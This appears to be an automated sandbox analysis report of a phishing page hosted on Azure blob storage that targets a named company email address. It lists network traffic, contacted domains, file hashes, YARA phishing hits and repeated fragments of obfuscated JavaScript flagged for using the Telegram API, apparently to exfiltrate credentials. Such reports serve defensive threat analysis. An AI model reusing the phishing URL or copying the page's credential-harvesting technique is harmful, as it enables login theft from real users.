Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49697
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49697 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702

Source: unknown	HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.16:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.16:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.16:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.16:49754 version: TLS 1.2

Source: classification engine

Classification label: mal68.phis.troj.win@21/22@46/267

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=1944,i,10635967694497959874,8854077005890642596,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=1944,i,10635967694497959874,8854077005890642596,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown

Source: Window Recorder

Window detected: More than 3 window changes detected

Stores files to the Windows start menu directory

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Screenshots

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
20.60.23.161	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
104.18.10.207	stackpath.bootstrapcdn.com	United States	13335	CLOUDFLARENETUS	false
104.18.40.68	unknown	United States	13335	CLOUDFLARENETUS	false
216.58.208.227	unknown	United States	15169	GOOGLEUS	false
172.217.19.202	unknown	United States	15169	GOOGLEUS	false
151.101.130.137	code.jquery.com	United States	54113	FASTLYUS	false
8.8.8.8	dns.google	United States	15169	GOOGLEUS	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
34.200.110.203	image.thum.io	United States	14618	AMAZON-AESUS	false
172.217.19.170	unknown	United States	15169	GOOGLEUS	false
64.233.162.84	unknown	United States	15169	GOOGLEUS	false
172.217.17.42	unknown	United States	15169	GOOGLEUS	false
104.21.26.223	unknown	United States	13335	CLOUDFLARENETUS	false
172.217.19.238	unknown	United States	15169	GOOGLEUS	false
1.1.1.1	unknown	Australia	13335	CLOUDFLARENETUS	false
172.217.17.78	unknown	United States	15169	GOOGLEUS	false
34.117.59.81	ipinfo.io	United States	139070	GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	false
172.217.17.35	unknown	United States	15169	GOOGLEUS	false
172.67.139.119	unknown	United States	13335	CLOUDFLARENETUS	false
142.250.181.100	www.google.com	United States	15169	GOOGLEUS	false
104.18.11.207	unknown	United States	13335	CLOUDFLARENETUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
13.227.8.64	unknown	United States	16509	AMAZON-02US	false
104.17.25.14	cdnjs.cloudflare.com	United States	13335	CLOUDFLARENETUS	false
13.227.8.47	d26p066pn2w0s0.cloudfront.net	United States	16509	AMAZON-02US	false
142.250.181.74	unknown	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.16

Contacted Domains

Name	IP	Active
stackpath.bootstrapcdn.com	104.18.10.207	true
d26p066pn2w0s0.cloudfront.net	13.227.8.47	true
code.jquery.com	151.101.130.137	true
cdnjs.cloudflare.com	104.17.25.14	true
ipinfo.io	34.117.59.81	true
maxcdn.bootstrapcdn.com	104.18.10.207	true
www.google.com	142.250.181.100	true
image.thum.io	34.200.110.203	true
api.telegram.org	149.154.167.220	true
dns.google	8.8.8.8	true
ka-f.fontawesome.com	unknown	unknown
kit.fontawesome.com	unknown	unknown
logo.clearbit.com	unknown	unknown

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide	6D49E4854DF6A2359FFAE0CF21BF8546	3BAF25A02AE2F61CE2FDEB8D1D4F08776C4A3BC4	E698AE09B819A5634941D9D79C17B74C8637AA2B4F452E8E64D756DF683322DE
Chrome Cache Entry: 100	ASCII text, with CRLF line terminators	ED8D9A242ED49B201D3BC152B2EA7612	713BC8456C3E2439E6313ABBD3E93E81DCD9EA04	A073439951D6AC57EDD9BF50B5AC9650397844B1F280AB0310156B331D8466EE
Chrome Cache Entry: 101	ASCII text, with no line terminators	AC2ACA9EAA84E1DEADB8507B24896865	39FEEC029B369917D2897C95FD450FF9EA64D08F	881851041A64BE06D8BAFCFD2D1DD85F071FCD755178B529420DC5858141EF44
Chrome Cache Entry: 102	PNG image data, 128 x 128, 8-bit/color RGB, non-interlaced	6D142FBDC3E4B2295E9571A7ED499563	EE8DB632B3FEBCD4684565451E3AED3DF3D674F3	E090068EAA196D65B33BC4F8D767771ED253F99FC8EAA80F542742D46966F4C9
Chrome Cache Entry: 104	ASCII text	048827075038BB29A926100FAC103075	344B5CF6498867A1806DB0287F339B12C00F34B5	88F23B85D81514D63DA43985D4E8BE67C1D4235E42768EBDC3783F88FB36C1E0
Chrome Cache Entry: 105	HTML document, Unicode text, UTF-8 text	BC270A10BA75866CCD5176A3B3108CE4	3AFC67B336310F492DD7C9AC9459A171235DDE00	55BB5EBFC749ED58BD7D6A5176D392F3E8D935E284D8E05C75D6EF3E9FF2296A
Chrome Cache Entry: 106	ASCII text	6A07DA9FAE934BAF3F749E876BBFDD96	46A436EBA01C79ACDB225757ED80BF54BAD6416B	D8AA24ECC6CECB1A60515BC093F1C9DA38A0392612D9AB8AE0F7F36E6EEE1FAD
Chrome Cache Entry: 107	JSON data	6B7A647D1B9880C6686665F8D0AE141A	656E4724C547D3E5CEE34DF5D845EE4EA2FE6BE1	24EE2A6B42F33AE6D67EFCD03BEC7C1A337E5226064AD6026878AA08AF2CDFAB
Chrome Cache Entry: 108	XML 1.0 document, Unicode text, UTF-8 (with BOM) text	9574C427831FF7B17F52EA4DB45A601E	991035543E1C832560A0B8F75473940584BC9079	3BDFD889C85E9100D3B930345CB84E0A9AFEE37844A10EFF3CA509BD614950FF
Chrome Cache Entry: 109	ASCII text, with very long lines (32030)	E071ABDA8FE61194711CFC2AB99FE104	F647A6D37DC4CA055CED3CF64BBC1F490070ACBA	85556761A8800D14CED8FCD41A6B8B26BF012D44A318866C0D81A62092EFD9BF
Chrome Cache Entry: 110	JSON data	3FA187421B5A45709B21C348556B4A6A	F44809B9AAA680AE2BD9952DEEE31F85FED9FFB1	BADDE82FD2CA7C7B153EC29AAABD4E9A370A953FF2C0591DFB19B4521D4AE518
Chrome Cache Entry: 111	ASCII text, with very long lines (14181)	2EBF0D88E73A9C8D5E6D55A1A1CECA01	962359C8CD63A3F8436171AD46D97D9F29ABAC4D	2B26394AAC8199778CD337D8046535B6EA9CB2DC698E4102029CA963E080E19F
Chrome Cache Entry: 113	ASCII text, with very long lines (19015)	70D3FDA195602FE8B75E0097EED74DDE	C3B977AA4B8DFB69D651E07015031D385DED964B	A52F7AA54D7BCAAFA056EE0A050262DFC5694AE28DEE8B4CAC3429AF37FF0D66
Chrome Cache Entry: 119	ASCII text, with very long lines (13061)	43AB92573DB23CAD409FEE52BE4915A3	7167480166EAEFD9D7E3F2CED22E15A57D4789CC	5756543ABC3CDB299ED8578412C39ABB2A6D50AA5376EA34877CF84B66AA356E
Chrome Cache Entry: 120	ASCII text, with very long lines (60130)	A12EC7EBE75A4D59A5DD6B79E2BA2E16	28F5DCC595EE6D4163481EF64170180502C8629B	FC5128DFDCDFA0C3A9967A6D2F19399D7BF1AAAE6AD7571B96B03915A1F30DDA
Chrome Cache Entry: 87	ASCII text, with very long lines (32012)	5F48FC77CAC90C4778FA24EC9C57F37D	9E89D1515BC4C371B86F4CB1002FD8E377C1829F	9365920887B11B33A3DC4BA28A0F93951F200341263E3B9CEFD384798E4BE398
Chrome Cache Entry: 88	Web Open Font Format (Version 2), TrueType, length 78168, version 331.-31196	A9FD1225FB2CD32320E2B931DCA01089	44EC5C6A868B4CE62350D9F040ED8E18F7A1D128	C5DD43F53F3AF822CBF17B1FB75F46192CDBD51724F277ACF6CF0DACB3FD57E7
Chrome Cache Entry: 92	ASCII text, with very long lines (32065)	2F6B11A7E914718E0290410E85366FE9	69BB69E25CA7D5EF0935317584E6153F3FD9A88C	05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
Chrome Cache Entry: 93	JSON data	8645C097E9731E50F79A861EA60A4587	174A617C8B7CC600DA6A634EDD74047412738FFB	2538F61D25F0E60E15BF64CC6FBA19F723D25CFC565A18EA5FB8DCD978C03D6D
Chrome Cache Entry: 95	ASCII text, with very long lines (48664)	14D449EB8876FA55E1EF3C2CC52B0C17	A9545831803B1359CFEED47E3B4D6BAE68E40E99	E7ED36CEEE5450B4243BBC35188AFABDFB4280C7C57597001DE0ED167299B01B
Chrome Cache Entry: 98	ASCII text, with very long lines (50758)	67176C242E1BDC20603C878DEE836DF3	27A71B00383D61EF3C489326B3564D698FC1227C	56C12A125B021D21A69E61D7190CEFA168D6C28CE715265CEA1B3B0112D169C4
Chrome Cache Entry: 99	ASCII text, with very long lines (26500)	76F34B71FC9FB641507FF6A822CC07F5	73ED2F8F21CD40FB496E61306ACBB5849D4DBFF4	6DEA47458A4CD7CD7312CC780A53C62E0C8B3CCC8D0B13C1AC0EA6E3DFCECEA8

Phishing

Yara detected HtmlPhish10

Source: Yara match	File source: 1.0.pages.csv, type: HTML
Source: Yara match	File source: 1.1.pages.csv, type: HTML
Source: Yara match	File source: 1.2.pages.csv, type: HTML
Source: Yara match	File source: 1.3.pages.csv, type: HTML
Source: Yara match	File source: 2.4.pages.csv, type: HTML
Source: Yara match	File source: 2.5.pages.csv, type: HTML
Source: Yara match	File source: dropped/chromecache_105, type: DROPPED

AI detected suspicious Javascript

Source: 0.0.id.script.csv

HTML page contains obfuscated javascript

Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com	HTTP Parser: (function(_0x28e6a0,_0x1fea61){var _0x5a2bf9=_0xff0d,_0x4f8b72=_0x28e6a0();while(!![]){try{var
Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#	HTTP Parser: (function(_0x28e6a0,_0x1fea61){var _0x5a2bf9=_0xff0d,_0x4f8b72=_0x28e6a0();while(!![]){try{var

Javascript uses Clearbit API to dynamically determine company logos

Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#	HTTP Parser: (function(_0x28e6a0,_0x1fea61){var _0x5a2bf9=_0xff0d,_0x4f8b72=_0x28e6a0();while(!![]){try{var _0x57b9e6=-parseint(_0x5a2bf9(0x132))/0x1+parseint(_0x5a2bf9(0xfb))/0x2+parseint(_0x5a2bf9(0x154))/0x3(parseint(_0x5a2bf9(0x164))/0x4)+-parseint(_0x5a2bf9(0x11a))/0x5+-parseint(_0x5a2bf9(0x14d))/0x6(-parseint(_0x5a2bf9(0x16b))/0x7)+-parseint(_0x5a2bf9(0x145))/0x8(parseint(_0x5a2bf9(0x166))/0x9)+-parseint(_0x5a2bf9(0x15d))/0xa(-parseint(_0x5a2bf9(0x13e))/0xb);if(_0x57b9e6===_0x1fea61)break;else _0x4f8b72['push'](_0x4f8b72['shift']());}catch(_0x1b12d0){_0x4f8b72['push'](_0x4f8b72['shift']());}}}(_0x15ca,0x49be4),$(document)['ready'](function(){var _0xd175a8=_0xff0d,_0x34f441=0x0;initializepage(),$(_0xd175a8(0x158))[_0xd175a8(0x148)](function(){var _0x22db1d=_0xd175a8;$(_0x22db1d(0x128))[_0x22db1d(0x167)](),$(_0x22db1d(0x115))[_0x22db1d(0xf7)](''),$(_0x22db1d(0x15a))[_0x22db1d(0x13f)]({'left':0xc8,'opacity':'hide'},0x0),$(_0x22db1d(0xfc))[_0x22db1d(0x13f)]({'right':0xc8,'opacity':'show'},0x3e8);});var _0x3f547...
Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com	HTTP Parser: (function(_0x28e6a0,_0x1fea61){var _0x5a2bf9=_0xff0d,_0x4f8b72=_0x28e6a0();while(!![]){try{var _0x57b9e6=-parseint(_0x5a2bf9(0x132))/0x1+parseint(_0x5a2bf9(0xfb))/0x2+parseint(_0x5a2bf9(0x154))/0x3(parseint(_0x5a2bf9(0x164))/0x4)+-parseint(_0x5a2bf9(0x11a))/0x5+-parseint(_0x5a2bf9(0x14d))/0x6(-parseint(_0x5a2bf9(0x16b))/0x7)+-parseint(_0x5a2bf9(0x145))/0x8(parseint(_0x5a2bf9(0x166))/0x9)+-parseint(_0x5a2bf9(0x15d))/0xa(-parseint(_0x5a2bf9(0x13e))/0xb);if(_0x57b9e6===_0x1fea61)break;else _0x4f8b72['push'](_0x4f8b72['shift']());}catch(_0x1b12d0){_0x4f8b72['push'](_0x4f8b72['shift']());}}}(_0x15ca,0x49be4),$(document)['ready'](function(){var _0xd175a8=_0xff0d,_0x34f441=0x0;initializepage(),$(_0xd175a8(0x158))[_0xd175a8(0x148)](function(){var _0x22db1d=_0xd175a8;$(_0x22db1d(0x128))[_0x22db1d(0x167)](),$(_0x22db1d(0x115))[_0x22db1d(0xf7)](''),$(_0x22db1d(0x15a))[_0x22db1d(0x13f)]({'left':0xc8,'opacity':'hide'},0x0),$(_0x22db1d(0xfc))[_0x22db1d(0x13f)]({'right':0xc8,'opacity':'show'},0x3e8);});var _0x3f547...

Javascript uses Telegram API

Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#	HTTP Parser: (function(_0x28e6a0,_0x1fea61){var _0x5a2bf9=_0xff0d,_0x4f8b72=_0x28e6a0();while(!![]){try{var _0x57b9e6=-parseint(_0x5a2bf9(0x132))/0x1+parseint(_0x5a2bf9(0xfb))/0x2+parseint(_0x5a2bf9(0x154))/0x3(parseint(_0x5a2bf9(0x164))/0x4)+-parseint(_0x5a2bf9(0x11a))/0x5+-parseint(_0x5a2bf9(0x14d))/0x6(-parseint(_0x5a2bf9(0x16b))/0x7)+-parseint(_0x5a2bf9(0x145))/0x8(parseint(_0x5a2bf9(0x166))/0x9)+-parseint(_0x5a2bf9(0x15d))/0xa(-parseint(_0x5a2bf9(0x13e))/0xb);if(_0x57b9e6===_0x1fea61)break;else _0x4f8b72['push'](_0x4f8b72['shift']());}catch(_0x1b12d0){_0x4f8b72['push'](_0x4f8b72['shift']());}}}(_0x15ca,0x49be4),$(document)['ready'](function(){var _0xd175a8=_0xff0d,_0x34f441=0x0;initializepage(),$(_0xd175a8(0x158))[_0xd175a8(0x148)](function(){var _0x22db1d=_0xd175a8;$(_0x22db1d(0x128))[_0x22db1d(0x167)](),$(_0x22db1d(0x115))[_0x22db1d(0xf7)](''),$(_0x22db1d(0x15a))[_0x22db1d(0x13f)]({'left':0xc8,'opacity':'hide'},0x0),$(_0x22db1d(0xfc))[_0x22db1d(0x13f)]({'right':0xc8,'opacity':'show'},0x3e8);});var _0x3f547...
Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com	HTTP Parser: (function(_0x28e6a0,_0x1fea61){var _0x5a2bf9=_0xff0d,_0x4f8b72=_0x28e6a0();while(!![]){try{var _0x57b9e6=-parseint(_0x5a2bf9(0x132))/0x1+parseint(_0x5a2bf9(0xfb))/0x2+parseint(_0x5a2bf9(0x154))/0x3(parseint(_0x5a2bf9(0x164))/0x4)+-parseint(_0x5a2bf9(0x11a))/0x5+-parseint(_0x5a2bf9(0x14d))/0x6(-parseint(_0x5a2bf9(0x16b))/0x7)+-parseint(_0x5a2bf9(0x145))/0x8(parseint(_0x5a2bf9(0x166))/0x9)+-parseint(_0x5a2bf9(0x15d))/0xa(-parseint(_0x5a2bf9(0x13e))/0xb);if(_0x57b9e6===_0x1fea61)break;else _0x4f8b72['push'](_0x4f8b72['shift']());}catch(_0x1b12d0){_0x4f8b72['push'](_0x4f8b72['shift']());}}}(_0x15ca,0x49be4),$(document)['ready'](function(){var _0xd175a8=_0xff0d,_0x34f441=0x0;initializepage(),$(_0xd175a8(0x158))[_0xd175a8(0x148)](function(){var _0x22db1d=_0xd175a8;$(_0x22db1d(0x128))[_0x22db1d(0x167)](),$(_0x22db1d(0x115))[_0x22db1d(0xf7)](''),$(_0x22db1d(0x15a))[_0x22db1d(0x13f)]({'left':0xc8,'opacity':'hide'},0x0),$(_0x22db1d(0xfc))[_0x22db1d(0x13f)]({'right':0xc8,'opacity':'show'},0x3e8);});var _0x3f547...

HTML body contains low number of good links

Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com	HTTP Parser: Number of links: 0
Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#	HTTP Parser: Number of links: 0

HTML title does not match URL

Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com	HTTP Parser: Title: Phillyshipyard - Mail does not match URL
Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#	HTTP Parser: Title: does not match URL

Invalid 'copyright' link found

Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com	HTTP Parser: Invalid link: Copyright 2024
Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#	HTTP Parser: Invalid link: Copyright 2024

Invalid 'forgot password' link found

Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com	HTTP Parser: Invalid link: Forgot password?
Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#	HTTP Parser: Invalid link: Forgot password?

